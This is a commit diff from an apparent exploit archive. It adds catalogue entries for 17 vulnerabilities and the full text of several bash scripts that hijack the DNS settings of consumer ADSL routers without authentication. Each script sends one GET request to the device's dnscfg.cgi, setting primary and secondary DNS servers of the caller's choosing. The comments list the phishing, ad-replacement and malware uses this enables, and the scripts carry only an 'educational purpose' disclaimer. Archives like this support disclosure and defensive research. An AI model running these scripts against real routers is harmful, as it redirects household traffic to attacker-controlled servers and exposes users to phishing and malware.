DB: 2016-09-14
17 new exploits Microsoft Windows Media Player 7.0 - '.wms' Arbitrary Script Cherry Music 0.35.1 - Arbitrary File Disclosure Battle.Net 1.5.0.7963 - Insecure File Permissions Privilege Escalation Windows x86 - Password Protected TCP Bind Shell (637 bytes) wdCalendar 2 - SQL Injection Zapya Desktop 1.803 - (ZapyaService.exe) Privilege Escalation Exper EWM-01 ADSL/MODEM - Unauthenticated DNS Change Open-Xchange App Suite 7.8.2 - Cross Site Scripting Open-Xchange Guard 2.4.2 - Multiple Cross Site Scripting Multiple Icecream Apps - Insecure File Permissions Privilege Escalation WinSMS 3.43 - Insecure File Permissions Privilege Escalation Microsoft Internet Explorer 11.0.9600.18482 - Use After Free AIOCP 1.3.x - 'cp_dpage.php' Full Path Disclosure AIOCP 1.3.x - Multiple Vulnerabilities ASUS DSL-X11 ADSL Router - Unauthenticated DNS Change COMTREND ADSL Router CT-5367 C01_R12_ CT-5624 C01_R03 - Unauthenticated DNS Change Tenda ADSL2/2+ Modem 963281TAN - Unauthenticated DNS Change PLANET VDR-300NU ADSL Router - Unauthenticated DNS Change PIKATEL 96338WS_ 96338L-2M-8M - Unauthenticated DNS Change Inteno EG101R1 VoIP Router - Unauthenticated DNS Change
This commit is contained in:
parent
28e25eeea1
commit
d5138d6962
21 changed files with 1943 additions and 15 deletions
20
files.csv
20
files.csv
|
@ -17745,7 +17745,6 @@ id,file,description,date,author,platform,type,port
|
|||
20412,platforms/jsp/remote/20412.txt,"Unify eWave ServletExec 3 - JSP Source Disclosure",2000-11-21,"Wojciech Woch",jsp,remote,0
|
||||
20413,platforms/unix/remote/20413.txt,"BB4 Big Brother Network Monitor 1.5 d2 - bb-hist.sh HISTFILE Parameter File Existence Disclosure",2000-11-20,"f8 Research Labs",unix,remote,0
|
||||
20414,platforms/unix/remote/20414.c,"Ethereal - AFS Buffer Overflow",2000-11-18,mat,unix,remote,0
|
||||
20424,platforms/windows/remote/20424.txt,"Microsoft Windows Media Player 7.0 - '.wms' Arbitrary Script",2000-11-22,"Sandro Gauci",windows,remote,0
|
||||
20416,platforms/php/webapps/20416.txt,"WordPress Plugin Mz-jajak 2.1 - SQL Injection",2012-08-10,StRoNiX,php,webapps,0
|
||||
20417,platforms/osx/local/20417.c,"Tunnelblick - Privilege Escalation (1)",2012-08-11,zx2c4,osx,local,0
|
||||
20418,platforms/solaris/local/20418.txt,"Solaris 10 Patch 137097-01 - Symlink Attack Privilege Escalation",2012-08-11,"Larry Cashdollar",solaris,local,0
|
||||
|
@ -18949,6 +18948,12 @@ id,file,description,date,author,platform,type,port
|
|||
21670,platforms/windows/remote/21670.txt,"Microsoft Windows Media Player 6/7 - Filename Buffer Overflow",2002-07-30,ken@FTU,windows,remote,0
|
||||
21671,platforms/unix/remote/21671.c,"Apache/mod_ssl (< 2.8.7) OpenSSL - 'OpenFuck.c' Remote Exploit (1)",2002-07-30,spabam,unix,remote,80
|
||||
40347,platforms/unix/remote/40347.txt,"Apache/mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow Exploit",2002-09-17,"Solar Eclipse",unix,remote,80
|
||||
40361,platforms/php/webapps/40361.py,"Cherry Music 0.35.1 - Arbitrary File Disclosure",2016-09-13,feedersec,php,webapps,80
|
||||
40362,platforms/windows/local/40362.txt,"Battle.Net 1.5.0.7963 - Insecure File Permissions Privilege Escalation",2016-09-13,Tulpa,windows,local,0
|
||||
40363,platforms/win_x86/shellcode/40363.c,"Windows x86 - Password Protected TCP Bind Shell (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
|
||||
40364,platforms/php/webapps/40364.txt,"wdCalendar 2 - SQL Injection",2016-09-13,"Alfonso Castillo Angel",php,webapps,80
|
||||
40365,platforms/windows/local/40365.txt,"Zapya Desktop 1.803 - (ZapyaService.exe) Privilege Escalation",2016-09-13,"Arash Khazaei",windows,local,0
|
||||
40367,platforms/cgi/webapps/40367.sh,"Exper EWM-01 ADSL/MODEM - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
|
||||
21673,platforms/windows/dos/21673.txt,"IPSwitch IMail 6.x/7.0.x - Web Calendaring Incomplete Post Denial of Service",2002-07-30,anonymous,windows,dos,0
|
||||
21674,platforms/linux/local/21674.c,"William Deich Super 3.x - SysLog Format String",2002-07-31,gobbles,linux,local,0
|
||||
21675,platforms/windows/remote/21675.pl,"Trillian 0.x IRC Module - Buffer Overflow",2002-07-31,"John C. Hennessy",windows,remote,0
|
||||
|
@ -25454,6 +25459,7 @@ id,file,description,date,author,platform,type,port
|
|||
28399,platforms/php/webapps/28399.txt,"CubeCart 3.0.x - Multiple Input Validation Vulnerabilities",2006-08-17,rgod,php,webapps,0
|
||||
28400,platforms/windows/remote/28400.html,"Microsoft Internet Explorer 6 - TSUserEX.dll ActiveX Control Memory Corruption",2006-08-17,nop,windows,remote,0
|
||||
28401,platforms/windows/dos/28401.html,"Microsoft Internet Explorer 6 - Visual Studio COM Object Instantiation Denial of Service",2006-08-08,XSec,windows,dos,0
|
||||
40378,platforms/linux/webapps/40378.txt,"Open-Xchange App Suite 7.8.2 - Cross Site Scripting",2016-09-13,"Jakub A>>oczek",linux,webapps,0
|
||||
28402,platforms/php/webapps/28402.txt,"Blog:CMS 4.1 - Dir_Plugins Parameter Multiple Remote File Inclusion",2006-08-17,Drago84,php,webapps,0
|
||||
28403,platforms/php/webapps/28403.txt,"Mambo LMTG Myhomepage 1.2 Component - Multiple Remote File Inclusion",2006-08-18,O.U.T.L.A.W,php,webapps,0
|
||||
28404,platforms/php/webapps/28404.txt,"Mambo Rssxt Component 1.0 - MosConfig_absolute_path Multiple Remote File Inclusion",2006-08-18,Crackers_Child,php,webapps,0
|
||||
|
@ -25565,6 +25571,7 @@ id,file,description,date,author,platform,type,port
|
|||
28515,platforms/php/webapps/28515.txt,"IDevSpot iSupport 1.8 - rightbar.php suser Parameter Cross-Site Scripting",2006-09-12,s3rv3r_hack3r,php,webapps,0
|
||||
28516,platforms/php/webapps/28516.txt,"IDevSpot iSupport 1.8 - open_tickets.php ticket_id Parameter Cross-Site Scripting",2006-09-12,s3rv3r_hack3r,php,webapps,0
|
||||
28517,platforms/php/webapps/28517.txt,"IDevSpot iSupport 1.8 - 'index.php' cons_page_title Parameter Cross-Site Scripting",2006-09-12,s3rv3r_hack3r,php,webapps,0
|
||||
40377,platforms/linux/webapps/40377.txt,"Open-Xchange Guard 2.4.2 - Multiple Cross Site Scripting",2016-09-13,"Benjamin Daniel Mussler",linux,webapps,0
|
||||
28518,platforms/php/webapps/28518.txt,"IDevSpot iSupport 1.8 - 'index.php' Remote File Inclusion",2006-09-12,s3rv3r_hack3r,php,webapps,0
|
||||
28519,platforms/php/webapps/28519.txt,"WM-News 0.5 - print.php Local File Inclusion",2006-09-12,"Daftrix Security",php,webapps,0
|
||||
28520,platforms/php/webapps/28520.txt,"Ractive Popper 1.41 - Childwindow.Inc.php Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0
|
||||
|
@ -25658,6 +25665,7 @@ id,file,description,date,author,platform,type,port
|
|||
28607,platforms/jsp/webapps/28607.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - addrlist Servlet Multiple Parameter SQL Injection",2006-09-20,"Tan Chew Keong",jsp,webapps,0
|
||||
28608,platforms/jsp/webapps/28608.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - maillist Servlet Multiple Parameter SQL Injection",2006-09-20,"Tan Chew Keong",jsp,webapps,0
|
||||
28609,platforms/jsp/webapps/28609.txt,"NeoSys Neon Webmail for Java 5.06/5.07 updateuser Servlet - in_id Variable Arbitrary User Information Modification",2006-09-20,"Tan Chew Keong",jsp,webapps,0
|
||||
40376,platforms/windows/local/40376.txt,"Multiple Icecream Apps - Insecure File Permissions Privilege Escalation",2016-09-13,Tulpa,windows,local,0
|
||||
28610,platforms/jsp/webapps/28610.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - updateuser Servlet in_name Parameter Cross-Site Scripting",2006-09-20,"Tan Chew Keong",jsp,webapps,0
|
||||
28611,platforms/php/webapps/28611.txt,"RedBLoG 0.5 - imgen.php Root Parameter Remote File Inclusion",2006-09-19,Root3r_H3ll,php,webapps,0
|
||||
28612,platforms/php/webapps/28612.txt,"RedBLoG 0.5 - admin/config.php root_path Parameter Remote File Inclusion",2006-09-19,Root3r_H3ll,php,webapps,0
|
||||
|
@ -25727,6 +25735,7 @@ id,file,description,date,author,platform,type,port
|
|||
28674,platforms/php/webapps/28674.pl,"Back-End CMS 0.4.5 - admin/index.php includes_path Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0
|
||||
28675,platforms/php/webapps/28675.txt,"Back-End CMS 0.4.5 - Facts.php includes_path Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0
|
||||
28676,platforms/php/webapps/28676.txt,"Back-End CMS 0.4.5 - search.php includes_path Parameter Remote File Inclusion",2006-09-25,Root3r_H3ll,php,webapps,0
|
||||
40375,platforms/windows/local/40375.txt,"WinSMS 3.43 - Insecure File Permissions Privilege Escalation",2016-09-13,Tulpa,windows,local,0
|
||||
28725,platforms/multiple/remote/28725.txt,"SAP Internet Transaction Server 6.10/6.20 - Cross-Site Scripting",2006-09-28,"ILION Research",multiple,remote,0
|
||||
28726,platforms/multiple/dos/28726.pl,"OpenSSL SSLv2 - Null Pointer Dereference Client Denial of Service",2006-09-28,"Noam Rathaus",multiple,dos,0
|
||||
28679,platforms/multiple/dos/28679.txt,"Evince PDF Reader 2.32.0.145 (Windows) / 3.4.0 (Linux) - Denial of Service",2013-10-02,Deva,multiple,dos,0
|
||||
|
@ -25900,6 +25909,7 @@ id,file,description,date,author,platform,type,port
|
|||
28860,platforms/windows/dos/28860.c,"FtpXQ Server 3.01 - MKD Command Remote Overflow Denial of Service",2006-10-24,"Federico Fazzi",windows,dos,0
|
||||
28861,platforms/php/webapps/28861.txt,"Comment IT 0.2 - PathToComment Parameter Remote File Inclusion",2006-10-25,"Cold Zero",php,webapps,0
|
||||
28862,platforms/php/webapps/28862.txt,"PHPMyConferences 8.0.2 - Init.php Remote File Inclusion",2006-10-25,The-0utl4w,php,webapps,0
|
||||
40374,platforms/windows/dos/40374.html,"Microsoft Internet Explorer 11.0.9600.18482 - Use After Free",2016-09-13,"Marcin Ressel",windows,dos,0
|
||||
28863,platforms/php/webapps/28863.txt,"MAXdev MD-Pro 1.0.76 - user.php Cross-Site Scripting",2006-10-26,r00t,php,webapps,0
|
||||
28864,platforms/php/webapps/28864.txt,"PHPLeague 0.81 - consult/miniseul.php cheminmini Parameter Remote File Inclusion",2006-10-26,ajaan,php,webapps,0
|
||||
28865,platforms/php/webapps/28865.txt,"PHPTreeView 1.0 - TreeViewClass.php Remote File Inclusion",2006-10-27,"Prince Islam",php,webapps,0
|
||||
|
@ -25973,7 +25983,7 @@ id,file,description,date,author,platform,type,port
|
|||
28932,platforms/php/webapps/28932.txt,"AIOCP 1.3.x - 'cp_users_online.php' order_field Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0
|
||||
28933,platforms/php/webapps/28933.txt,"AIOCP 1.3.x - 'cp_codice_fiscale.php' choosed_language Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0
|
||||
28934,platforms/php/webapps/28934.txt,"AIOCP 1.3.x - 'cp_links_search.php' orderdir Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0
|
||||
28935,platforms/php/webapps/28935.txt,"AIOCP 1.3.x - 'cp_dpage.php' Full Path Disclosure",2006-11-06,"laurent gaffie",php,webapps,0
|
||||
28935,platforms/php/webapps/28935.txt,"AIOCP 1.3.x - Multiple Vulnerabilities",2006-11-06,"laurent gaffie",php,webapps,0
|
||||
28936,platforms/php/webapps/28936.txt,"AIOCP 1.3.x - 'cp_show_ec_products.php' Full Path Disclosure",2006-11-06,"laurent gaffie",php,webapps,0
|
||||
28937,platforms/php/webapps/28937.txt,"AIOCP 1.3.x - 'cp_show_page_help.php' Full Path Disclosure",2006-11-06,"laurent gaffie",php,webapps,0
|
||||
28938,platforms/php/webapps/28938.txt,"IPManager 2.3 - 'index.php' Cross-Site Scripting",2006-11-07,spaceballyopsolo,php,webapps,0
|
||||
|
@ -26030,6 +26040,7 @@ id,file,description,date,author,platform,type,port
|
|||
28990,platforms/asp/webapps/28990.txt,"INFINICART - sendpassword.asp email Parameter Cross-Site Scripting",2006-11-13,"laurent gaffie",asp,webapps,0
|
||||
28991,platforms/asp/webapps/28991.txt,"INFINICART - 'login.asp' Multiple Parameter Cross-Site Scripting",2006-11-13,"laurent gaffie",asp,webapps,0
|
||||
28992,platforms/asp/webapps/28992.txt,"INFINICART - browse_group.asp groupid Parameter SQL Injection",2006-11-13,"laurent gaffie",asp,webapps,0
|
||||
40373,platforms/cgi/webapps/40373.sh,"ASUS DSL-X11 ADSL Router - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
|
||||
28993,platforms/asp/webapps/28993.txt,"INFINICART - added_to_cart.asp ProductID Parameter SQL Injection",2006-11-13,"laurent gaffie",asp,webapps,0
|
||||
28994,platforms/asp/webapps/28994.txt,"INFINICART - browsesubcat.asp Multiple Parameter SQL Injection",2006-11-13,"laurent gaffie",asp,webapps,0
|
||||
28995,platforms/php/webapps/28995.txt,"WebTester 5.x - Multiple Vulnerabilities",2013-10-16,X-Cisadane,php,webapps,80
|
||||
|
@ -26137,6 +26148,7 @@ id,file,description,date,author,platform,type,port
|
|||
29093,platforms/asp/webapps/29093.txt,"Texas Rankem - player.asp selPlayer Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0
|
||||
29094,platforms/asp/webapps/29094.txt,"Texas Rankem - tournaments.asp tournament_id Parameter SQL Injection",2006-11-18,"Aria-Security Team",asp,webapps,0
|
||||
29095,platforms/php/webapps/29095.txt,"Blog:CMS 4.1.3 - list.php Cross-Site Scripting",2006-11-18,Katatafish,php,webapps,0
|
||||
40372,platforms/cgi/webapps/40372.sh,"COMTREND ADSL Router CT-5367 C01_R12_ CT-5624 C01_R03 - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
|
||||
29096,platforms/windows/remote/29096.rb,"NetGear MA521 Wireless Driver 5.148.724 - Long Beacon Probe Buffer Overflow",2006-11-18,"Laurent Butti",windows,remote,0
|
||||
29097,platforms/php/webapps/29097.txt,"Boonex 2.0 Dolphin - 'index.php' Remote File Inclusion",2006-11-20,S.W.A.T.,php,webapps,0
|
||||
29098,platforms/php/webapps/29098.txt,"BirdBlog 1.4 - /admin/admincore.php msg Parameter Cross-Site Scripting",2006-11-20,the_Edit0r,php,webapps,0
|
||||
|
@ -26232,6 +26244,7 @@ id,file,description,date,author,platform,type,port
|
|||
29197,platforms/asp/webapps/29197.txt,"Evolve Shopping Cart - products.asp SQL Injection",2006-11-27,"Aria-Security Team",asp,webapps,0
|
||||
29198,platforms/php/webapps/29198.txt,"b2evolution 1.8.2/1.9 - _404_not_found.page.php Multiple Parameter Cross-Site Scripting",2006-11-16,"lotto fischer",php,webapps,0
|
||||
29199,platforms/php/webapps/29199.txt,"b2evolution 1.8.2/1.9 - _410_stats_gone.page.php app_name Parameter Cross-Site Scripting",2006-11-16,"lotto fischer",php,webapps,0
|
||||
40371,platforms/cgi/webapps/40371.sh,"Tenda ADSL2/2+ Modem 963281TAN - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
|
||||
29200,platforms/php/webapps/29200.txt,"b2evolution 1.8.2/1.9 - _referer_spam.page.php Multiple Parameter Cross-Site Scripting",2006-11-16,"lotto fischer",php,webapps,0
|
||||
29201,platforms/osx/local/29201.c,"Apple Mac OSX 10.4.x - Shared_Region_Make_Private_Np Kernel Function Local Memory Corruption",2006-11-29,LMH,osx,local,0
|
||||
29202,platforms/php/webapps/29202.txt,"Seditio1.10 / Land Down 8.0 Under - polls.php SQL Injection",2006-11-30,ajann,php,webapps,0
|
||||
|
@ -26341,6 +26354,7 @@ id,file,description,date,author,platform,type,port
|
|||
29331,platforms/php/webapps/29331.txt,"ImpressPages CMS 3.6 - manage() Function Remote Code Execution",2013-11-01,LiquidWorm,php,webapps,0
|
||||
29332,platforms/php/webapps/29332.txt,"WordPress Theme Think Responsive 1.0 - Arbitrary File Upload",2013-11-01,"Byakuya Kouta",php,webapps,0
|
||||
29333,platforms/asp/webapps/29333.txt,"Efkan Forum 1.0 - Grup Variable SQL Injection",2006-12-22,ShaFuq31,asp,webapps,0
|
||||
40370,platforms/cgi/webapps/40370.sh,"PLANET VDR-300NU ADSL Router - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
|
||||
29334,platforms/cfm/webapps/29334.txt,"Future Internet - index.cfm Multiple Parameter SQL Injection",2006-12-23,Linux_Drox,cfm,webapps,0
|
||||
29335,platforms/cfm/webapps/29335.txt,"Future Internet - index.cfm categoryId Parameter Cross-Site Scripting",2006-12-23,Linux_Drox,cfm,webapps,0
|
||||
29336,platforms/asp/webapps/29336.txt,"Chatwm 1.0 - SelGruFra.asp SQL Injection",2006-12-24,ShaFuq31,asp,webapps,0
|
||||
|
@ -26423,6 +26437,7 @@ id,file,description,date,author,platform,type,port
|
|||
29413,platforms/php/webapps/29413.txt,"Magic Photo Storage Website - admin/delete_member.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0
|
||||
29414,platforms/php/webapps/29414.txt,"Magic Photo Storage Website - admin/index.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0
|
||||
29415,platforms/php/webapps/29415.txt,"Magic Photo Storage Website - admin/list_members.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0
|
||||
40369,platforms/cgi/webapps/40369.sh,"PIKATEL 96338WS_ 96338L-2M-8M - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
|
||||
29416,platforms/php/webapps/29416.txt,"Magic Photo Storage Website - admin/membership_pricing.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0
|
||||
29417,platforms/php/webapps/29417.txt,"Magic Photo Storage Website - admin/send_email.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0
|
||||
29418,platforms/php/webapps/29418.txt,"Magic Photo Storage Website - include/config.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0
|
||||
|
@ -26493,6 +26508,7 @@ id,file,description,date,author,platform,type,port
|
|||
29489,platforms/php/webapps/29489.txt,"Indexu 5.0/5.3 - 'login.php' Error_msg Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0
|
||||
29490,platforms/windows/remote/29490.txt,"avm fritz!dsl igd control service 2.2.29 - Directory Traversal Information Disclosure",2007-01-17,DPR,windows,remote,0
|
||||
29491,platforms/php/webapps/29491.txt,"MyBloggie 2.1.5 - 'index.php' PATH_INFO Parameter Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0
|
||||
40368,platforms/cgi/webapps/40368.sh,"Inteno EG101R1 VoIP Router - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
|
||||
29492,platforms/php/webapps/29492.txt,"MyBloggie 2.1.5 - 'login.php' PATH_INFO Parameter Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0
|
||||
29495,platforms/php/webapps/29495.txt,"Sabros.US 1.7 - 'index.php' Cross-Site Scripting",2007-01-18,CorryL,php,webapps,0
|
||||
29496,platforms/linux/remote/29496.txt,"ArsDigita Community System 3.4.x - Directory Traversal",2007-01-18,"Elliot Kendall",linux,remote,0
|
||||
|
|
Can't render this file because it is too large.
|
82
platforms/cgi/webapps/40367.sh
Executable file
82
platforms/cgi/webapps/40367.sh
Executable file
|
@ -0,0 +1,82 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Exper EWM-01 ADSL/MODEM
|
||||
# Unauthenticated Remote DNS Change Exploit
|
||||
#
|
||||
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
|
||||
# https://www.ethical-hacker.org/
|
||||
# https://www.facebook.com/ethicalhackerorg
|
||||
#
|
||||
# Description:
|
||||
# The vulnerability exist in the web interface, which is
|
||||
# accessible without authentication.
|
||||
#
|
||||
# Once modified, systems use foreign DNS servers, which are
|
||||
# usually set up by cybercriminals. Users with vulnerable
|
||||
# systems or devices who try to access certain sites are
|
||||
# instead redirected to possibly malicious sites.
|
||||
#
|
||||
# Modifying systems' DNS settings allows cybercriminals to
|
||||
# perform malicious activities like:
|
||||
#
|
||||
# o Steering unknowing users to bad sites:
|
||||
# These sites can be phishing pages that
|
||||
# spoof well-known sites in order to
|
||||
# trick users into handing out sensitive
|
||||
# information.
|
||||
#
|
||||
# o Replacing ads on legitimate sites:
|
||||
# Visiting certain sites can serve users
|
||||
# with infected systems a different set
|
||||
# of ads from those whose systems are
|
||||
# not infected.
|
||||
#
|
||||
# o Controlling and redirecting network traffic:
|
||||
# Users of infected systems may not be granted
|
||||
# access to download important OS and software
|
||||
# updates from vendors like Microsoft and from
|
||||
# their respective security vendors.
|
||||
#
|
||||
# o Pushing additional malware:
|
||||
# Infected systems are more prone to other
|
||||
# malware infections (e.g., FAKEAV infection).
|
||||
#
|
||||
# Disclaimer:
|
||||
# This or previous programs is for Educational
|
||||
# purpose ONLY. Do not use it without permission.
|
||||
# The usual disclaimer applies, especially the
|
||||
# fact that Todor Donev is not liable for any
|
||||
# damages caused by direct or indirect use of the
|
||||
# information or functionality provided by these
|
||||
# programs. The author or any Internet provider
|
||||
# bears NO responsibility for content or misuse
|
||||
# of these programs or any derivatives thereof.
|
||||
# By using these programs you accept the fact
|
||||
# that any damage (dataloss, system crash,
|
||||
# system compromise, etc.) caused by the use
|
||||
# of these programs is not Todor Donev's
|
||||
# responsibility.
|
||||
#
|
||||
# Use them at your own risk!
|
||||
#
|
||||
#
|
||||
|
||||
if [[ $# -gt 3 || $# -lt 2 ]]; then
|
||||
echo " Exper EWM-01 ADSL MODEM/ROUTER"
|
||||
echo " Unauthenticated Remote DNS Change Exploit"
|
||||
echo " ==================================================================="
|
||||
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
|
||||
echo " Example: $0 133.7.133.7 8.8.8.8"
|
||||
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
|
||||
echo ""
|
||||
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
|
||||
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
|
||||
exit;
|
||||
fi
|
||||
GET=`which GET 2>/dev/null`
|
||||
if [ $? -ne 0 ]; then
|
||||
echo " Error : libwww-perl not found =/"
|
||||
exit;
|
||||
fi
|
||||
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
|
||||
|
82
platforms/cgi/webapps/40368.sh
Executable file
82
platforms/cgi/webapps/40368.sh
Executable file
|
@ -0,0 +1,82 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Inteno EG101R1 VoIP Router
|
||||
# Unauthenticated Remote DNS Change Exploit
|
||||
#
|
||||
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
|
||||
# https://www.ethical-hacker.org/
|
||||
# https://www.facebook.com/ethicalhackerorg
|
||||
#
|
||||
# Description:
|
||||
# The vulnerability exist in the web interface, which is
|
||||
# accessible without authentication.
|
||||
#
|
||||
# Once modified, systems use foreign DNS servers, which are
|
||||
# usually set up by cybercriminals. Users with vulnerable
|
||||
# systems or devices who try to access certain sites are
|
||||
# instead redirected to possibly malicious sites.
|
||||
#
|
||||
# Modifying systems' DNS settings allows cybercriminals to
|
||||
# perform malicious activities like:
|
||||
#
|
||||
# o Steering unknowing users to bad sites:
|
||||
# These sites can be phishing pages that
|
||||
# spoof well-known sites in order to
|
||||
# trick users into handing out sensitive
|
||||
# information.
|
||||
#
|
||||
# o Replacing ads on legitimate sites:
|
||||
# Visiting certain sites can serve users
|
||||
# with infected systems a different set
|
||||
# of ads from those whose systems are
|
||||
# not infected.
|
||||
#
|
||||
# o Controlling and redirecting network traffic:
|
||||
# Users of infected systems may not be granted
|
||||
# access to download important OS and software
|
||||
# updates from vendors like Microsoft and from
|
||||
# their respective security vendors.
|
||||
#
|
||||
# o Pushing additional malware:
|
||||
# Infected systems are more prone to other
|
||||
# malware infections (e.g., FAKEAV infection).
|
||||
#
|
||||
# Disclaimer:
|
||||
# This or previous programs is for Educational
|
||||
# purpose ONLY. Do not use it without permission.
|
||||
# The usual disclaimer applies, especially the
|
||||
# fact that Todor Donev is not liable for any
|
||||
# damages caused by direct or indirect use of the
|
||||
# information or functionality provided by these
|
||||
# programs. The author or any Internet provider
|
||||
# bears NO responsibility for content or misuse
|
||||
# of these programs or any derivatives thereof.
|
||||
# By using these programs you accept the fact
|
||||
# that any damage (dataloss, system crash,
|
||||
# system compromise, etc.) caused by the use
|
||||
# of these programs is not Todor Donev's
|
||||
# responsibility.
|
||||
#
|
||||
# Use them at your own risk!
|
||||
#
|
||||
#
|
||||
|
||||
if [[ $# -gt 3 || $# -lt 2 ]]; then
|
||||
echo " Inteno EG101R1 VoIP Router "
|
||||
echo " Unauthenticated Remote DNS Change Exploit"
|
||||
echo " ==================================================================="
|
||||
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
|
||||
echo " Example: $0 133.7.133.7 8.8.8.8"
|
||||
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
|
||||
echo ""
|
||||
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
|
||||
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
|
||||
exit;
|
||||
fi
|
||||
GET=`which GET 2>/dev/null`
|
||||
if [ $? -ne 0 ]; then
|
||||
echo " Error : libwww-perl not found =/"
|
||||
exit;
|
||||
fi
|
||||
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
|
||||
|
81
platforms/cgi/webapps/40369.sh
Executable file
81
platforms/cgi/webapps/40369.sh
Executable file
|
@ -0,0 +1,81 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# PIKATEL 96338WS, 96338L-2M-8M Unauthenticated Remote DNS Change Exploit
|
||||
#
|
||||
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
|
||||
# https://www.ethical-hacker.org/
|
||||
# https://www.facebook.com/ethicalhackerorg
|
||||
#
|
||||
# Description:
|
||||
# The vulnerability exist in the web interface, which is
|
||||
# accessible without authentication.
|
||||
#
|
||||
# Once modified, systems use foreign DNS servers, which are
|
||||
# usually set up by cybercriminals. Users with vulnerable
|
||||
# systems or devices who try to access certain sites are
|
||||
# instead redirected to possibly malicious sites.
|
||||
#
|
||||
# Modifying systems' DNS settings allows cybercriminals to
|
||||
# perform malicious activities like:
|
||||
#
|
||||
# o Steering unknowing users to bad sites:
|
||||
# These sites can be phishing pages that
|
||||
# spoof well-known sites in order to
|
||||
# trick users into handing out sensitive
|
||||
# information.
|
||||
#
|
||||
# o Replacing ads on legitimate sites:
|
||||
# Visiting certain sites can serve users
|
||||
# with infected systems a different set
|
||||
# of ads from those whose systems are
|
||||
# not infected.
|
||||
#
|
||||
# o Controlling and redirecting network traffic:
|
||||
# Users of infected systems may not be granted
|
||||
# access to download important OS and software
|
||||
# updates from vendors like Microsoft and from
|
||||
# their respective security vendors.
|
||||
#
|
||||
# o Pushing additional malware:
|
||||
# Infected systems are more prone to other
|
||||
# malware infections (e.g., FAKEAV infection).
|
||||
#
|
||||
# Disclaimer:
|
||||
# This or previous programs is for Educational
|
||||
# purpose ONLY. Do not use it without permission.
|
||||
# The usual disclaimer applies, especially the
|
||||
# fact that Todor Donev is not liable for any
|
||||
# damages caused by direct or indirect use of the
|
||||
# information or functionality provided by these
|
||||
# programs. The author or any Internet provider
|
||||
# bears NO responsibility for content or misuse
|
||||
# of these programs or any derivatives thereof.
|
||||
# By using these programs you accept the fact
|
||||
# that any damage (dataloss, system crash,
|
||||
# system compromise, etc.) caused by the use
|
||||
# of these programs is not Todor Donev's
|
||||
# responsibility.
|
||||
#
|
||||
# Use them at your own risk!
|
||||
#
|
||||
#
|
||||
|
||||
if [[ $# -gt 3 || $# -lt 2 ]]; then
|
||||
echo " PIKATEL 96338WS, 96338L-2M-8M ADSL Router "
|
||||
echo " Unauthenticated Remote DNS Change Exploit"
|
||||
echo " ==================================================================="
|
||||
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
|
||||
echo " Example: $0 133.7.133.7 8.8.8.8"
|
||||
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
|
||||
echo ""
|
||||
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
|
||||
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
|
||||
exit;
|
||||
fi
|
||||
GET=`which GET 2>/dev/null`
|
||||
if [ $? -ne 0 ]; then
|
||||
echo " Error : libwww-perl not found =/"
|
||||
exit;
|
||||
fi
|
||||
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
|
||||
|
82
platforms/cgi/webapps/40370.sh
Executable file
82
platforms/cgi/webapps/40370.sh
Executable file
|
@ -0,0 +1,82 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# PLANET VDR-300NU ADSL ROUTER
|
||||
# Unauthenticated Remote DNS Change Exploit
|
